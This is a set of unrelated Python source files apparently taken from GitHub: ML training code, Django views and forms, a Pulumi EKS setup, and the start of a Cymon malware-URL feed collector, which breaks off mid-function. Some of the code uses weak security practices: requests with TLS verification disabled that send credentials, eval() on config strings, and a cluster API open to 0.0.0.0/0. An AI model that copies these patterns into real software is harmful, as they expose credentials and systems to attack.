self.X_train, self.X_test, self.y_train, self.y_test = train_test_split(X, y, test_size=0.3, random_state=42)
self._end(self.load_dataset.__name__)
def build(self):
self._start(self.build.__name__)
self.model = tree.DecisionTreeClassifier(random_state=0)
self._end(self.build.__name__)
def train(self):
self._start(self.train.__name__)
start = time.time()
params = {'max_depth':range(3,20)}
grid_search = GridSearchCV(self.model, param_grid=params, n_jobs=4)
grid_search.fit(self.X_train, self.y_train)
self.write("GridSearch BestParams " + str(grid_search.best_params_) )
self.write("GridSearch BestScore " + str(grid_search.best_score_))
self.model = tree.DecisionTreeClassifier(**grid_search.best_params_)
# Class fit method of the classifier
self.model.fit(self.X_train, self.y_train)
elapsed_time = time.time() - start
elapsed = str("Train elapsed_time:{0}".format(elapsed_time) + "[sec]")
self.write(elapsed)
self._end(self.train.__name__)
def predict(self):
self._start(self.predict.__name__)
self.pred_test = self.model.predict(self.X_test)
report = str (classification_report(self.y_test, self.pred_test) )
self.write(report)
self._end(self.predict.__name__)
def visualize(self):
cmatrix = confusion_matrix(self.y_test, self.pred_test)
self.view.visualize(cmatrix, self.model)
############################################################
# Classifier View
class MainView(ZApplicationView):
# Class variables
# ClassifierView Constructor
def __init__(self, title, x, y, width, height):
super(MainView, self).__init__(title, x, y, width, height)
self.font = QFont("Arial", 10)
self.setFont(self.font)
# 1 Add a labeled combobox to top dock area
self.add_datasets_combobox()
# 2 Add a textedit to the left pane of the center area.
self.text_editor = QTextEdit()
self.text_editor.setLineWrapColumnOrWidth(600)
self.text_editor.setLineWrapMode(QTextEdit.FixedPixelWidth)
# 3 Add a tabbed_window to the right pane of the center area.
self.tabbed_window = ZTabbedWindow(self, 0, 0, width/2, height)
# 4 Add a description text edit.
self.description = QTextEdit()
self.description.setLineWrapColumnOrWidth(600)
self.description.setLineWrapMode(QTextEdit.FixedPixelWidth)
# 5 Add a figure_view to the right pane of the center area.
self.figure_view = ZScalableScrolledFigureView(self, 0, 0, width/2, height)
# 6 Add a figure_view to the right pane of the center area.
self.tree_view = ZScalableScrolledDecisionTreeView(self, 0, 0, width/2, height)
self.add(self.text_editor)
self.add(self.tabbed_window)
self.tabbed_window.add("Description", self.description)
self.tabbed_window.add("ConfusionMatrix", self.figure_view)
self.tabbed_window.add("DecisionTree", self.tree_view)
self.figure_view.hide()
self.tree_view.hide()
self.show()
def add_datasets_combobox(self):
self.dataset_id = Iris
self.datasets_combobox = ZLabeledComboBox(self, "Datasets", Qt.Horizontal)
# We use the following datasets of sklearn to test DecisionTreeClassifier.
self.datasets = {"Iris": Iris, "Digits": Digits, "Wine": Wine, "BreastCancer": BreastCancer}
title = self.get_title()
self.setWindowTitle( "Iris" + " - " + title)
self.datasets_combobox.add_items(self.datasets.keys())
self.datasets_combobox.add_activated_callback(self.datasets_activated)
self.datasets_combobox.set_current_text(self.dataset_id)
self.start_button = ZPushButton("Start", self)
self.clear_button = ZPushButton("Clear", self)
self.start_button.add_activated_callback(self.start_button_activated)
self.clear_button.add_activated_callback(self.clear_button_activated)
self.datasets_combobox.add(self.start_button)
self.datasets_combobox.add(self.clear_button)
self.set_top_dock(self.datasets_combobox)
def write(self, text):
self.text_editor.append(text)
self.text_editor.repaint()
def datasets_activated(self, text):
self.dataset_id = self.datasets[text]
title = self.get_title()
self.setWindowTitle(text + " - " + title)
def start_button_activated(self, text):
self.model = DecisionTreeClassifierModel(self.dataset_id, self)
self.start_button.setEnabled(False)
self.clear_button.setEnabled(False)
try:
self.model.run()
except:
pass
self.start_button.setEnabled(True)
self.clear_button.setEnabled(True)
def clear_button_activated(self, text):
self.text_editor.setText("")
self.description.setText("")
self.figure_view.hide()
self.tree_view.hide()
if plt.gcf() != None:
plt.close()
def visualize(self, cmatrix, tree):
# 1 Show figure view
self.figure_view.show()
if plt.gcf() != None:
plt.close()
sns.set()
df = pd.DataFrame(cmatrix)
sns.heatmap(df, annot=True, fmt="d")
self.figure_view.set_figure(plt)
# 2 Show tree view
self.tree_view.show()
feature_names = None
try:
feature_names = tree.dataset.feature_names
except:
pass
target_names = None
try:
target_names = tree.dataset.target_names
except:
pass
self.tree_view.set_tree(tree, feature_names, target_names)
############################################################
#
if main(__name__):
try:
app_name = os.path.basename(sys.argv[0])
applet = QApplication(sys.argv)
main_view = MainView(app_name, 40, 40, 1000, 500)
main_view.show ()
applet.exec_()
except:
traceback.print_exc()
| sarah-antillia/SOL4Py_V4 | ml/DecisionTreeClassifier.py | DecisionTreeClassifier.py | py | 8,676 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "sys.path.append",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 21,
"usage_type": "attribute"
},
{
"api_name": "traceback.print_exc",
"line_number": 72,
"usage_type": "call"
},
{
"api_name": "sklearn.datasets.lo... |
42262216968 | import os
import math
import multiprocessing
from tqdm import tqdm
from argparse import Namespace
from typing import Iterable, Optional
mp = multiprocessing.get_context("spawn")
from utils import _create_model_training_folder
import torch
import torch.nn.functional as F
import torchvision
from torch.nn.parameter import Parameter
from torch.utils.tensorboard import SummaryWriter
from tspipe import TSPipe
from tspipe.profiler import profile_semantic
from tspipe.dataloader import FastDataLoader, DummyInputGenerator
class BYOLTrainer:
def __init__(self, online_network, target_network, predictor, optimizer, device, scheduler, **params):
self.online_network = online_network
self.target_network = target_network
self.optimizer = optimizer
self.device = device
self.predictor = predictor
self.max_epochs = params['max_epochs']
self.writer = SummaryWriter()
self.m = params['m']
self.batch_size = params['batch_size']
self.num_workers = params['num_workers']
self.checkpoint_interval = params['checkpoint_interval']
self.image_x = eval(params['input_shape'])[0]
self.scheduler = scheduler
_create_model_training_folder(self.writer, files_to_same=["./config/config.yaml", "main.py", 'trainer.py'])
self.dummy_input = True if params['dummy_input'] == True else False
if self.dummy_input:
print("Warning: Dummy Input Enabled.")
@torch.no_grad()
def _update_target_network_parameters(self):
"""
Momentum update of the key encoder
"""
for param_q, param_k in zip(self.online_network.parameters(), self.target_network.parameters()):
param_k.data = param_k.data * self.m + param_q.data * (1. - self.m)
@staticmethod
def regression_loss(x, y):
x = F.normalize(x, dim=1)
y = F.normalize(y, dim=1)
return 2 - 2 * (x * y).sum(dim=-1)
def initializes_target_network(self):
# init momentum network as encoder net
for param_q, param_k in zip(self.online_network.parameters(), self.target_network.parameters()):
param_k.data.copy_(param_q.data) # initialize
param_k.requires_grad = False # not update by gradient
def train(self, train_dataset):
train_loader = FastDataLoader(train_dataset, batch_size=self.batch_size,
num_workers=self.num_workers, drop_last=False, shuffle=True, pin_memory=True)
niter = 0
model_checkpoints_folder = os.path.join(self.writer.log_dir, 'checkpoints')
self.initializes_target_network()
batch_id = 0
for epoch_counter in range(self.max_epochs):
if self.dummy_input:
dummy_input_gen = DummyInputGenerator(self.batch_size, input_shape=self.image_x)
pbar = tqdm(dummy_input_gen)
else:
pbar = tqdm(train_loader)
for (batch_view_1, batch_view_2), _ in pbar:
batch_id += 1
profile_semantic(niter, 0, 0, False, None, 0, 'copy')
batch_view_1 = batch_view_1.to(self.device)
profile_semantic(niter, 0, 0, False, None, 0, 'copy_finish')
profile_semantic(niter, 1, 0, False, None, 0, 'copy')
batch_view_2 = batch_view_2.to(self.device)
profile_semantic(niter, 1, 0, False, None, 0, 'copy_finish')
if niter == 0:
grid = torchvision.utils.make_grid(batch_view_1[:32])
self.writer.add_image('views_1', grid, global_step=niter)
grid = torchvision.utils.make_grid(batch_view_2[:32])
self.writer.add_image('views_2', grid, global_step=niter)
loss = self.update(batch_view_1, batch_view_2, niter)
self.writer.add_scalar('loss', loss, global_step=niter)
# torch.cuda.nvtx.range_push("BackwardCompute")
profile_semantic(niter, 0, 0, False, None, 0, 'backward')
self.optimizer.zero_grad()
loss.backward()
profile_semantic(niter, 0, 0, False, None, 0, 'backward_finish')
profile_semantic(niter, 0, 0, False, None, 0, 'optimize')
self.optimizer.step()
# torch.cuda.nvtx.range_pop()
self._update_target_network_parameters() # update the key encoder
profile_semantic(niter, 0, 0, False, None, 0, 'optimize_finish')
pbar.set_postfix({'loss': loss, 'batch_id': batch_id})
niter += 1
if batch_id % 100 == 0:
self.save_model(os.path.join(model_checkpoints_folder, f'model_batch{batch_id}_part0.pt'))
if batch_id > 1:
loss_fn = torch.nn.MSELoss(reduction='sum')
print("End of epoch {}".format(epoch_counter))
if self.scheduler is not None:
self.scheduler.step()
# save checkpoints
self.save_model(os.path.join(model_checkpoints_folder, 'model.pth'))
def update(self, batch_view_1, batch_view_2, niter = 0):
# compute query feature
profile_semantic(niter, 0, 0, False, None, 0, 'compute')
predictions_from_view_1 = self.predictor(self.online_network(batch_view_1))
profile_semantic(niter, 0, 0, False, None, 0, 'compute_finish')
profile_semantic(niter, 1, 0, False, None, 0, 'compute')
predictions_from_view_2 = self.predictor(self.online_network(batch_view_2))
profile_semantic(niter, 1, 0, False, None, 0, 'compute_finish')
# compute key features
with torch.no_grad():
profile_semantic(niter, 0, 0, True, None, 0, 'compute')
targets_to_view_2 = self.target_network(batch_view_1)
profile_semantic(niter, 0, 0, True, None, 0, 'compute_finish')
profile_semantic(niter, 1, 0, True, None, 0, 'compute')
targets_to_view_1 = self.target_network(batch_view_2)
profile_semantic(niter, 1, 0, True, None, 0, 'compute_finish')
profile_semantic(niter, 0, 0, False, None, 0, 'loss')
loss = self.regression_loss(predictions_from_view_1, targets_to_view_1)
loss += self.regression_loss(predictions_from_view_2, targets_to_view_2)
profile_semantic(niter, 0, 0, False, None, 0, 'loss')
return loss.mean()
def save_model(self, PATH):
torch.save({
'online_network_state_dict': self.online_network.state_dict(),
'target_network_state_dict': self.target_network.state_dict(),
'optimizer_state_dict': self.optimizer.state_dict(),
}, PATH)
class DummyBYOLTrainer(BYOLTrainer):
def train(self, train_dataset):
train_loader = FastDataLoader(train_dataset, batch_size=self.batch_size,
num_workers=self.num_workers, drop_last=False, shuffle=True)
self.initializes_target_network()
for epoch_counter in range(self.max_epochs):
pbar = tqdm(train_loader)
for (batch_view_1, batch_view_2), _ in pbar:
# do nothing
pass
print("End of epoch {}".format(epoch_counter))
class TSPipeBYOLTrainer(BYOLTrainer):
def __init__(self, online_network, target_network, predictor, optimizer: torch.optim.Optimizer, device, scheduler, **params):
super().__init__(online_network, target_network, predictor, optimizer, device, scheduler, **params)
self.optimizer = optimizer
self.online_network = online_network
self.target_network = target_network
self.predictor_network = predictor
self.dummy_input = True if params['dummy_input'] == True else False
self.image_x = eval(params['input_shape'])[0]
self.scheduler = scheduler
self.params = params
if self.dummy_input:
print("Warning: Dummy Input Enabled.")
@staticmethod
def contrastive_loss(online_view_1, online_view_2, target_view_1, target_view_2, args: Namespace, extra_args: Namespace):
loss = TSPipeBYOLTrainer.regression_loss(online_view_1, target_view_2)
loss += TSPipeBYOLTrainer.regression_loss(online_view_2, target_view_1)
return loss.mean()
@staticmethod
def calculate_target_network_parameters(m, online_new_param, target_param:Optional[Iterable[Parameter]] = None):
"""
Momentum update of the key encoder
"""
@torch.no_grad()
def calc():
result = []
for param_q, param_k in zip(online_new_param, target_param):
detached = param_k.clone().detach()
detached = detached * m + param_q.data * (1. - m)
result.append(detached)
return result
return calc()
def train(self, train_dataset):
model_checkpoints_folder = os.path.join(self.writer.log_dir, 'checkpoints')
self.initializes_target_network()
initial_lr = self.optimizer.param_groups[0]['lr']
print(f"initial_lr : {initial_lr}")
initial_momentum = self.params['m']
print(f"initial_momentum : {initial_momentum}")
warmup_epochs = 10
lr = self.adjust_learning_rate(1, warmup_epochs = warmup_epochs, initial_lr = initial_lr)
m = self.adjust_moco_momentum(0, initial_momentum)
self.tspipe = TSPipe(self.online_network,
self.target_network,
self.predictor_network,
self.optimizer,
TSPipeBYOLTrainer.contrastive_loss,
TSPipeBYOLTrainer.calculate_target_network_parameters,
self.m,
model_checkpoints_folder
)
if self.tspipe.is_primary:
# prepare dataloader
if self.dummy_input:
train_loader = DummyInputGenerator(self.batch_size, input_shape=self.image_x)
else:
train_loader = FastDataLoader(train_dataset, batch_size=self.batch_size,
num_workers=self.num_workers, drop_last=False, shuffle=True, pin_memory=False)
iters_per_epoch = len(train_loader)
print(f"iters_per_epoch : {iters_per_epoch}")
niter = 0
for epoch_counter in range(self.max_epochs):
pbar = tqdm(train_loader)
for (batch_view_1, batch_view_2), _ in pbar:
if niter == 0:
grid = torchvision.utils.make_grid(batch_view_1[:32])
self.writer.add_image('views_1', grid, global_step=niter)
grid = torchvision.utils.make_grid(batch_view_2[:32])
self.writer.add_image('views_2', grid, global_step=niter)
loss = self.tspipe.feed(batch_view_1.share_memory_(), batch_view_2.share_memory_())
if loss is not None:
self.writer.add_scalar('loss', loss, global_step=niter)
pbar.set_postfix({'loss': loss, 'batch_id': niter})
niter += 1
print("End of epoch {}".format(epoch_counter))
self.tspipe.feed_epoch()
lr = self.adjust_learning_rate(epoch_counter+1, warmup_epochs = warmup_epochs, initial_lr = initial_lr)
m = self.adjust_moco_momentum(epoch_counter, initial_momentum)
self.tspipe.update_lr(lr)
self.tspipe.update_momentum(m)
self.writer.add_scalar('learning_rate', lr, global_step=niter)
self.writer.add_scalar('momentum', m, global_step=niter)
self.tspipe.stop()
# save checkpoints
print("Saving checkpoints...")
self.save_model(os.path.join(model_checkpoints_folder, 'model.pth'))
print("Saving checkpoints OK")
def adjust_learning_rate(self, epoch, warmup_epochs, initial_lr):
"""Decays the learning rate with half-cycle cosine after warmup"""
if epoch < warmup_epochs:
lr = initial_lr * epoch / warmup_epochs
else:
lr = initial_lr * 0.5 * (1. + math.cos(math.pi * (epoch - warmup_epochs) / (self.params['max_epochs'] - warmup_epochs)))
for param_group in self.optimizer.param_groups:
param_group['lr'] = lr
return lr
def adjust_moco_momentum(self, epoch, initial_momentum):
"""Adjust moco momentum based on current epoch"""
m = 1. - 0.5 * (1. + math.cos(math.pi * epoch / self.params['max_epochs'])) * (1. - initial_momentum)
return m
def update(self, batch_view_1, batch_view_2):
# compute query feature
predictions_from_view_1 = self.predictor(self.online_network(batch_view_1))
predictions_from_view_2 = self.predictor(self.online_network(batch_view_2))
# compute key features
with torch.no_grad():
targets_to_view_2 = self.target_network(batch_view_1)
targets_to_view_1 = self.target_network(batch_view_2)
loss = self.regression_loss(predictions_from_view_1, targets_to_view_1)
loss += self.regression_loss(predictions_from_view_2, targets_to_view_2)
return loss.mean() | kaist-ina/TSPipe | benchmarks/byol/trainer.py | trainer.py | py | 13,650 | python | en | code | 6 | github-code | 36 | [
{
"api_name": "multiprocessing.get_context",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "torch.utils.tensorboard.SummaryWriter",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "utils._create_model_training_folder",
"line_number": 36,
"usage_type": "... |
20353033243 | from __future__ import absolute_import
import itertools
from django import forms
from .models import Episode
class ScoreboardForm(forms.Form):
def __init__(self, *args, **kwargs):
classes = kwargs.pop("classes")
super(ScoreboardForm, self).__init__(*args, **kwargs)
classes_choices = [(c.id, c.name) for c in classes]
self.fields["classes"] = forms.MultipleChoiceField(
choices=classes_choices, widget=forms.CheckboxSelectMultiple()
)
# Each tuple in choices has two elements, id and name of each level
# First element is the actual value set on the model
# Second element is the string displayed on the dropdown menu
episodes_choices = ((episode.id, episode.name) for episode in Episode.objects.all())
self.fields["episodes"] = forms.MultipleChoiceField(
choices=itertools.chain(episodes_choices),
widget=forms.CheckboxSelectMultiple(),
)
class LevelModerationForm(forms.Form):
def __init__(self, *args, **kwargs):
classes = kwargs.pop("classes")
teacher = kwargs.pop("teacher")
super(LevelModerationForm, self).__init__(*args, **kwargs)
# If the teacher is an admin, append teacher names or "(you)" to classes
if teacher.is_admin:
classes_choices = [
(
c.id,
f"{c.name} "
+ (
"(you)"
if c.teacher == teacher
else f"({c.teacher.new_user.first_name} {c.teacher.new_user.last_name})"
),
)
for c in classes
]
else:
classes_choices = [(c.id, c.name) for c in classes]
self.fields["classes"] = forms.MultipleChoiceField(
choices=classes_choices, widget=forms.CheckboxSelectMultiple()
)
| ocadotechnology/rapid-router | game/forms.py | forms.py | py | 1,935 | python | en | code | 53 | github-code | 36 | [
{
"api_name": "django.forms.Form",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "django.forms",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "django.forms.MultipleChoiceField",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "dj... |
10623176651 | """An AWS Python Pulumi program"""
import pulumi
from pulumi_aws import eks
import networking
config = pulumi.Config();
environment = config.require('environment');
instance_size = config.require('instance-size');
eks_service_role = config.require('eks-service-role');
node_instance_role = config.require('node-instance-role');
node_pool_desired_size = config.require('pool-desired-size');
node_pool_min_size = config.require('pool-min-size');
node_pool_max_size = config.require('pool-max-size');
node_ssh_key = config.require('node-ssh-key')
eks_node_disk_size = config.require('eks-node-disk-size')
eks_version = config.require('eks-version')
#Create EKS required Roles
eks_cluster = eks.Cluster(
f'{environment}',
role_arn=eks_service_role,
version=eks_version,
tags={
'Name': f'{environment}',
},
vpc_config=eks.ClusterVpcConfigArgs(
public_access_cidrs=['0.0.0.0/0'],
security_group_ids=[networking.eks_security_group.id],
subnet_ids=networking.subnet_ids,
),
)
eks_node_group = eks.NodeGroup(
f'{environment}-wng1',
cluster_name=eks_cluster.name,
node_group_name=f'{environment}-wng1',
node_role_arn=node_instance_role,
subnet_ids=networking.subnet_ids,
disk_size=int(eks_node_disk_size),
instance_types=[instance_size],
remote_access=eks.NodeGroupRemoteAccessArgs(
ec2_ssh_key=node_ssh_key,
),
tags={
'Name': f'{environment}-wng1',
},
scaling_config=eks.NodeGroupScalingConfigArgs(
desired_size=int(node_pool_desired_size),
max_size=int(node_pool_max_size),
min_size=int(node_pool_min_size),
),
) | dtorresf/iac | pulumi/eks/__main__.py | __main__.py | py | 1,663 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pulumi.Config",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "pulumi_aws.eks.Cluster",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "pulumi_aws.eks",
"line_number": 22,
"usage_type": "name"
},
{
"api_name": "pulumi_aws.eks.Clu... |
14159899947 | from seqeval.metrics import classification_report
from seqeval.metrics import f1_score
from typing import List
import os
# the order for evaluating the script is in the main function
def create_fake_conll_form_without_iob_to_emNER_input():
"""tokenized sentences for emNER
input: iob format"""
with open("/NerKor/test.iob", "r", encoding="utf-8") as f:
corpus = f.readlines()
current = "form\n" # to the emNER form
for i in range(len(corpus)):
if corpus[i] != "\n":
current += corpus[i].split("\t")[0] + "\n"
else:
current += "\n"
with open("input_for_emNER_nerkor_test.conllup", "w", encoding="utf-8") as f:
f.write(current)
def conll_conv2_iobes():
"""conll convert to iobes form"""
if not os.path.exists("nekor_test.out"):
return
with open("nerkor_test.out", "r", encoding="utf-8") as f:
corpus = f.readlines()
current = ""
for i in range(len(corpus)):
if i == 0:
continue
if corpus[i] != "\n":
current += corpus[i].split("\t")[0] + "\t" + corpus[i].split("\t")[-1]
else:
current += "\n"
with open("emNER_nerkor_test.iobes", "w", encoding="utf-8") as f:
f.write(current)
def iobes_convert2_iob():
"""emNER has an iobes output format, so we convert it to simple iob"""
if not os.path.exists("emNER_nerkor_test.iobes"):
return
with open("emNER_nerkor_test.iobes", "r", encoding="utf-8") as f:
corpus = f.readlines()
with open("emNER_nerkor_test.iob", "w", encoding="utf-8") as f:
for i in range(len(corpus)):
if corpus[i] != "\n":
line = corpus[i].split("\t")[0] + "\t" + corpus[i].split("\t")[1]
if line.split("\t")[1].startswith("1"):
temp = line.split("\t")[1][1:]
line = corpus[i].split("\t")[0] + "\t" + "B" + temp
if line.split("\t")[1].startswith("E"):
temp = line.split("\t")[1][1:]
line = corpus[i].split("\t")[0] + "\t" + "I" + temp
f.write(line)
else:
f.write("\n")
def pred():
if not os.path.exists("emNER_nerkor_test.iob"):
return
with open("emNER_nerkor_test.iob", "r", encoding="utf-8") as f:
pred_iob = f.readlines()
pred_list = list()
current_list = list()
for i in range(len(pred_iob)):
if len(pred_iob[i].strip()) != 0:
current_list.append(pred_iob[i].split("\t")[1][:-1])
else:
pred_list.append(current_list)
current_list = list()
print(len(pred_list))
return pred_list
def gold():
with open("/NerKor/test.iob", "r", encoding="utf-8") as f:
gold_iob = f.readlines()
gold_list = list()
current_list = list()
for i in range(len(gold_iob)):
if len(gold_iob[i].strip()) != 0:
current_list.append(gold_iob[i].split("\t")[1][:-1])
else:
gold_list.append(current_list)
current_list = list()
print(len(gold_list))
return gold_list
def fscore(gold_iob: List[List[str]], pred_iob: List[List[str]]):
print(f1_score(gold_iob, pred_iob))
print(classification_report(gold_iob, pred_iob))
if __name__ == "__main__":
# create_fake_conll_form_without_iob_to_emNER_input()
# bash: cat input_for_emNER_nerkor_test.conllup | docker run -i mtaril/emtsv:latest emMorph,emTag,emNER > nerkor_test.out
# conll_conv2_iob()
# iobes_convert2_iob()
fscore(gold(), pred())
| huspacy/huspacy-resources | scripts/benchmark/emNER_eval.py | emNER_eval.py | py | 3,617 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.path.exists",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 30,
"usage_type": "attribute"
},
{
"api_name": "os.path.exists",
"line_number": 52,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number... |
26419246863 | import cv2
import numpy as np
from functions import top_offset
class SceneMoments():
def __init__(self, sections_img, color, min_contour_size=1000, type_object="", offset=True, compl=False):
self.min_contour_size = min_contour_size
self.type_object = type_object
self.bw = np.all(sections_img == color, axis=-1).astype(np.uint8)
if offset:
self.bw = self.bw[top_offset:,:]
cv2.waitKey(0)
sections_bw = self.bw * 255
self.contours = self.get_contours(sections_bw)
self.contour, self.contour_index = self.get_contour()
self.defects = self.get_defects()
self.compl = compl
if compl:
sections_bw_compl = 255 - sections_bw
self.contours_compl = self.get_contours(sections_bw_compl)
self.defects_compl = self.get_defects()
def get_contours(self, img_bw):
contours, _ = cv2.findContours(img_bw, cv2.RETR_LIST, cv2.CHAIN_APPROX_NONE)
return contours
def get_defects(self):
chull_list = [cv2.convexHull(contour,returnPoints=False) for contour in self.contours]
defects = [cv2.convexityDefects(contour, chull) for (contour,chull) in zip(self.contours, chull_list)]
if len(defects) == 0 or np.all(np.equal(defects[0], None)):
return []
defect = defects[self.contour_index]
if not isinstance(defect, np.ndarray):
return []
defect = defect[:,0,:].tolist()
defect = [[start, end, mid, length] for start, end, mid, length in defect if length > self.min_contour_size]
return defect
'''
Return the largest contour
'''
def get_contour(self):
if len(self.contours) == 0:
return [], -1
largest_area = 0
contour = self.contours[0]
i = 0
for _i, _contour in enumerate(self.contours):
area = cv2.contourArea(_contour)
if area > largest_area:
largest_area = area
contour = _contour
i = _i
return contour, i
# return self.contours[0], 0
'''
Return a list of string containing useful data about the object: length of the contours and length of the defects for both, complement and normal
'''
def sstr(self):
if not self.compl:
lengths = "{} contours: {} defects: {}".format(self.type_object, len(self.contours), len(self.defects))
return [lengths, ""]
else:
lengths = "{} contours: {} defects: {}".format(self.type_object, len(self.contours), len(self.defects))
lengths_compl = "Compl contours: {} defects: {}".format(len(self.contours_compl), len(self.defects_compl))
return [lengths, lengths_compl, ""]
def paint_defects(self, img, color):
if len(self.contours) == 0:
return img
contour = self.contour
for s, e, m, l in self.defects:
cv2.circle(img, (contour[m][0][0], contour[m][0][1] + top_offset), 5, color, -1)
return img
def paint_lines(self, img, color):
if len(self.contours) == 0:
return img
contour = self.contour
for s, e, m, l in self.defects:
cv2.line(img, (contour[s][0][0], contour[s][0][1] + top_offset), (contour[e][0][0], contour[e][0][1] + top_offset), color, 2)
return img
def paint_contours(self, img, color):
if len(self.contours) == 0:
return img
contour = self.contour
contour = np.array([[[c[0][0], c[0][1] + top_offset]] for c in contour])
cv2.drawContours(img, contour, -1, color, 2)
return img | onmax/Robotics | scene-detection/detection/scene_moments.py | scene_moments.py | py | 3,808 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.all",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "numpy.uint8",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "functions.top_offset",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "cv2.waitKey",
"li... |
12083042499 | import json
import logging
from django.contrib import messages
from django.contrib.auth.decorators import login_required, user_passes_test
from django.core.management import call_command
from django.http import HttpRequest, HttpResponse
from django.http.response import HttpResponseRedirect
from django.urls import reverse
from django.utils.timezone import now as tz_now
from django.views.decorators.csrf import csrf_exempt
from django.views.decorators.http import require_http_methods
from .models import LinearIssue
logger = logging.getLogger(__name__)
@login_required
@user_passes_test(lambda u: u.is_staff)
def import_issues(request: HttpRequest) -> HttpResponseRedirect:
if not request.user.has_perms("linear.use_api"):
messages.add_message(
request, messages.ERROR, "You do not permission to use the Linear API"
)
else:
call_command("import_issues")
messages.add_message(
request,
messages.SUCCESS,
"All Linear issues have been imported successfully",
)
return HttpResponseRedirect(reverse("admin:linear_linearissue_changelist"))
@csrf_exempt
@require_http_methods(["POST"])
def webhook(request: HttpRequest) -> HttpResponse:
"""
Process Linear webhook event.
This webhook currently only listens for Issue events, and it treats both
"Create" and "Update" events in the same way. It will set the identifier,
team_name, title, state and estimate fields. The project_name and
milestone_name are not included in the webhook payload.
"""
try:
body = json.loads(request.body.decode("utf-8"))
data = body["data"]
if body["type"] != "Issue":
return HttpResponse("We are not interested in non-Issue updates")
except (json.JSONDecodeError, KeyError):
logger.exception("Unable to process Linear webhook event")
return HttpResponse(
"We couldn't process the request, but we're sending back a 200 anyway."
)
# we always get id, team, state in the payload. project/milestone are not included.
id = data["id"]
title = data["title"]
team_name = data["team"]["name"]
state = data["state"]["name"]
estimate = data.get("estimate")
identifier = f'{data["team"]["key"]}-{data["number"]}'
try:
issue = LinearIssue.objects.get(id=id)
except LinearIssue.DoesNotExist:
issue = LinearIssue.objects.create(id=id)
issue.title = title
issue.state = state
issue.estimate = estimate
issue.team_name = team_name
issue.identifier = identifier
issue.last_refreshed_at = tz_now()
issue.save()
return HttpResponse("Task updated")
| yunojuno/django-linear | linear/views.py | views.py | py | 2,704 | python | en | code | 3 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "django.http.HttpRequest",
"line_number": 21,
"usage_type": "name"
},
{
"api_name": "django.contrib.messages.add_message",
"line_number": 23,
"usage_type": "call"
},
{
"api... |
451100359 | #!/usr/bin/python3
from __future__ import division
from core.class_utils import MalwareUrl
from core.config_utils import get_base_config
from datetime import datetime, timedelta
from core.dns_utils import resolve_dns
from core.log_utils import get_module_logger
from core.virus_total import get_urls_for_ip
import dateutil.parser
import json
import math
import os
import requests
import sys
import time
CDIR = os.path.dirname(os.path.realpath(__file__))
ROOTDIR = os.path.abspath(os.path.join(CDIR, os.pardir))
BASECONFIG = get_base_config(ROOTDIR)
LOGGING = get_module_logger(__name__)
TYPES = ['malware-url']
NAME = 'Cymon'
DISABLED = False
CYMON_USER = 'YOUR USERNAME'
CYMON_PASS = 'YOUR PASSWORD'
BATCH_SIZE = 100
# AVsGgRbdVjrVcoBZyoid: Abuse.ch Ransomware Tracker
# AVsGgNL4VjrVcoBZyoib: Abuse.ch Zeus Tracker
# AVvtZm8i2c0QRQctzx4f: Bambenek Consulting C2
# AVsIOKQlVjrVcoBZyojw: Cyber Crime Tracker
# AVsGX4iNVjrVcoBZyoiH: Malc0de
# AVsGXy7tVjrVcoBZyoiB: URLVir
# AVsGgHxAVjrVcoBZyoiX: VX Vault
FEED_LIST = ['AVsGgRbdVjrVcoBZyoid', 'AVsGgNL4VjrVcoBZyoib', 'AVvtZm8i2c0QRQctzx4f', 'AVsGX4iNVjrVcoBZyoiH', 'AVsGXy7tVjrVcoBZyoiB', 'AVsGgHxAVjrVcoBZyoiX']
def cymon_auth():
"""Authenticate against the Cymon API.
Returns:
- result: (type: string) Cymon JWT token.
"""
try:
payload = {
'username': CYMON_USER,
'password': CYMON_PASS}
headers = {'Content-Type': 'application/json'}
LOGGING.info('Authenticating against Cymon API...')
request = requests.post(
'https://api.cymon.io/v2/auth/login',
data=json.dumps(payload),
headers=headers,
verify=False)
if request.status_code == 200:
LOGGING.info('Authentication successful!')
return json.loads(request.text)['jwt']
else:
LOGGING.error(
'Problem connecting to Cymon. Status code:{0}. Please try again later.'.format(
request.status_code))
except requests.exceptions.ConnectionError as e:
LOGGING.warning('Problem connecting to Cymon. Error: {0}'.format(e))
except Exception as e:
LOGGING.warning('Problem connecting to Cymon. Aborting task.')
LOGGING.exception(sys.exc_info())
LOGGING.exception(type(e))
LOGGING.exception(e.args)
LOGGING.exception(e)
return False
def get_cymon_feed_size(jwt, feed_id):
"""Determine the number of results a feed will return (max: 1000).
Params:
- jwt: (type: string) JWT token.
- feed_id: (type: string) Cymon feed ID.
Returns:
- total: (type: int) feed size.
"""
try:
today = datetime.utcnow()
threshold = today - timedelta(days=BASECONFIG.malware_days)
headers = {'Authorization': 'Bearer {0}'.format(jwt)}
payload = {
'startDate': threshold.strftime('%Y-%m-%d'),
'endDate': today.strftime('%Y-%m-%d'),
'size': 1}
LOGGING.info('Determining feed size...')
request = requests.get(
'https://api.cymon.io/v2/ioc/search/feed/{0}'.format(feed_id),
params=payload,
headers=headers,
verify=False)
if request.status_code == 200:
LOGGING.info('Request successful!')
response = json.loads(request.text)
if 'total' in response:
total = int(response['total'])
if total > 1000:
LOGGING.warning(
'API request returned more than 1000 results.')
total = 1000
return total
else:
LOGGING.error(
'Problem connecting to Cymon. Status code:{0}. Please try again later.'.format(
request.status_code))
except requests.exceptions.ConnectionError as e:
LOGGING.warning('Problem connecting to Cymon. Error: {0}'.format(e))
except Exception as e:
LOGGING.warning('Problem connecting to Cymon. Aborting task.')
